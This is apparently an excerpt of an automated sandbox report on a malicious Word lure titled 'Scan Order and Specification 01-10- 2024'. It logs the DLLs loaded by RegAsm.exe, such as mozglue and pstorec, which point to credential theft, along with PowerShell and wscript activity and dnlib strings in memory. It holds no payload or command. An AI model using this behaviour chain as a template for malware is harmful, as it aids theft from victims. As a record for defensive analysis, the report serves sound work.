                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Scan Order and Specification 01-10- 2024.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Scan Order and Specification 01-10- 2024.docx
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: Scan Order and Specification 01-10- 2024.docxInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
                Source: Scan Order and Specification 01-10- 2024.docxInitial sample: OLE zip file path = word/media/image4.emf
                Source: Scan Order and Specification 01-10- 2024.docxInitial sample: OLE zip file path = word/media/image3.emf
                Source: Scan Order and Specification 01-10- 2024.docxInitial sample: OLE zip file path = word/media/image2.emf
                Source: Scan Order and Specification 01-10- 2024.docxInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000C.00000002.407100012.0000000000789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.407267759.0000000000F50000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000C.00000002.407100012.0000000000789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.407267759.0000000000F50000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.pdb source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
